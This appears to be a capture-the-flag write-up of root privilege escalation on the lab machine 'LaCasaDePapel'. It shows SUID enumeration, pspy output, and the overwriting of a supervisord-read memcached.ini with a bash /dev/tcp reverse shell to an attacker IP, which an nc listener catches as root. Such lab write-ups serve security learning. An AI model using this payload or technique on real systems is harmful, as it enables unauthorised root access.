4 box enum > privesc
SuidEnum
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/abuild-sudo
/bin/bbsuid
------------------------------
lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x 4 professo professo 4096 Aug 8 07:14 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professo professo 4096 Jan 31 2019 .ssh
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
lacasadepapel [/tmp/.d]$ ./pspy64 -f
2019/07/26 05:26:01 FS: OPEN | /etc/supervisord.conf
2019/07/26 05:26:01 FS: ACCESS | /etc/supervisord.conf
2019/07/26 05:26:01 FS: OPEN DIR | /home/professor
2019/07/26 05:26:01 FS: OPEN DIR | /home/professor/
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor/
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor/
2019/07/26 05:26:01 FS: CLOSE_NOWRITE DIR | /home/professor
2019/07/26 05:26:01 FS: CLOSE_NOWRITE DIR | /home/professor/
2019/07/26 05:26:01 FS: OPEN | /home/professor/memcached.ini
2019/07/26 05:26:01 FS: ACCESS | /home/professor/memcached.ini
2019/07/26 05:26:01 FS: CLOSE_NOWRITE | /home/professor/memcached.ini
# we can delete memcached.ini and create a new one
lacasadepapel [~]$ echo -e "[program:memcached]\ncommand = bash -c 'bash -i >& /dev/tcp/10.10.16.161/443 0>&1'" > memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = bash -c 'bash -i >& /dev/tcp/10.10.16.161/443 0>&1'
$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.131] 58244
bash: cannot set terminal process group (3518): Not a tty
bash: no job control in this shell
bash-4.4# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Last updated